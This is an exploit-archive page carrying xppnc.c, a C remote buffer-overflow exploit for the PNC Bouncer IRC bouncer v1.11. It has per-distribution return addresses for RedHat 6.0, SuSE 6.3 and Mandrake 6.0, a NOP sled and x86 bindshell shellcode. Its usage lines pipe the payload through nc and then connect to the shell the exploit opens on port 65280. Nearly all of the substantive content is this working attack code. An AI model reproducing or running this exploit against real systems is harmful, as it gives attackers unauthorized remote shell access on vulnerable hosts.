xppnc.c

xppnc.c: Posted Jul 21, 2000; Authored by RaiSe | Site undersec.com; PNC Bouncer remote exploit - tested against v1.11 on RedHat 6.0, SuSE 6.3, and Mandrake 6.0.; tags | exploit, remote; systems | linux, redhat, suse, mandrake; SHA-256 | f3e7d956629059a23a4eafb60363507ed837755b27f531596180153d41af5c6f; Download | Favorite | View

xppnc.c

/* PNC Bouncer Xploit por RaiSe                 */
/* Testeado en version 1.11                     */
/*                                              */
/* Offset en RedHat 6.0 0xbffffb24              */
/* Offset en SuSe 6.3 0xbffff824 (Thx |QuasaR|) */
/* Offset en Mandrake 6.0 0xbffff3e4 (Thx PowR) */
/* bindshell by ADM                             */
/*                                              */
/* UNDERSEC Security Team                       */
/* http://www.undersec.com                      */

#include <stdio.h>

int i;
char *ptr;
unsigned long *ptr2,dire;
char bindshell[] =
  "\x33\xDB\x33\xC0\xB0\x1B\xCD\x80\x33\xD2\x33\xc0\x8b\xDA\xb0\x06"
  "\xcd\x80\xfe\xc2\x75\xf4\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x62"
  "\xeb\x62\x5e\x56\xac\x3c\xfd\x74\x06\xfe\xc0\x74\x0b\xeb\xf5\xb0"
  "\x30\xfe\xc8\x88\x46\xff\xeb\xec\x5e\xb0\x02\x89\x06\xfe\xc8\x89"
  "\x46\x04\xb0\x06\x89\x46\x08\xb0\x66\x31\xdb\xfe\xc3\x89\xf1\xcd"
  "\x80\x89\x06\xb0\x02\x66\x89\x46\x0c\xb0\xff\x66\x89\x46\x0e\x8d"
  "\x46\x0c\x89\x46\x04\x31\xc0\x89\x46\x10\xb0\x10\x89\x46\x08\xb0"
  "\x66\xfe\xc3\xcd\x80\xb0\x01\x89\x46\x04\xb0\x66\xb3\x04\xcd\x80\xeb\x04"
  "\xeb\x4c\xeb\x52\x31\xc0\x89\x46\x04\x89\x46\x08\xb0\x66\xfe\xc3\xcd\x80"
  "\x88\xc3\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xfe\xc1\xcd\x80\xb0\x3f\xfe\xc1"
  "\xcd\x80\xb8\x2e\x62\x69\x6e\x40\x89\x06\xb8\x2e\x73\x68\x21\x40\x89\x46"
  "\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e"
  "\x08\x8d\x56\x0c\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x45\xff\xff"
  "\xff\xFF\xFD\xFF\x50\x72\x69\x76\x65\x74\x20\x41\x44\x4D\x63\x72\x65\x77"; 

char buffer[1091];

int main(int argc, char *argv[])
{
  if (argc<3) {
    printf("\nPNC Bouncer Xploit por RaiSe");
    printf("\nUNDERSEC Security TEAM\nhttp://www.undersec.com");
    printf("\n\nModo de empleo: %s offset n | nc host puerto\n",argv[0]);
    printf("                nc host 65280\n\n");
    printf("n=1 - RedHat 6.0\nn=2 - SuSe 6.3\nn=3 - Mandrake 6.0\noffset normalmente 0 (en mandrake 1200)\n\n");
    exit(0);
  }

  if ((strcmp(argv[2],"1")) == 0) { dire=0xbffffb24; }
  if ((strcmp(argv[2],"2")) == 0) { dire=0xbffff824; }
  if ((strcmp(argv[2],"3")) == 0) { dire=0xbffff3e4; }

  for(i=0;i<1091;i++)
    buffer[i]=0x00;
    ptr=buffer;

  for(i=0;i<1011-strlen(bindshell);i++)
    *(ptr++)=0x90;
  for(i=0;i<strlen(bindshell);i++)
    *(ptr++)=bindshell[i];
  ptr2=(long *)ptr;
  for(i=0;i<20;i++)
    *(ptr2++)=dire+atoi(argv[1]);

  sleep(4);
  printf("USER %s\n",buffer);
}
/*                    www.hack.co.za           [19 July]*/

Top Authors In Last 30 Days

Red Hat 205 files
Ubuntu 84 files
Gentoo 31 files
Debian 21 files
tmrswrr 10 files
Sina Kheirkhah 7 files
bRpsd 4 files
Rodolfo Tavares 4 files
nu11secur1ty 3 files
Google Security Research 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,078)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,350)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,266)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,658)
UNIX (9,425)
UnixWare (187)
Windows (6,666)
Other

xppnc.c

xppnc.c

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

xppnc.c

Share This

xppnc.c

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems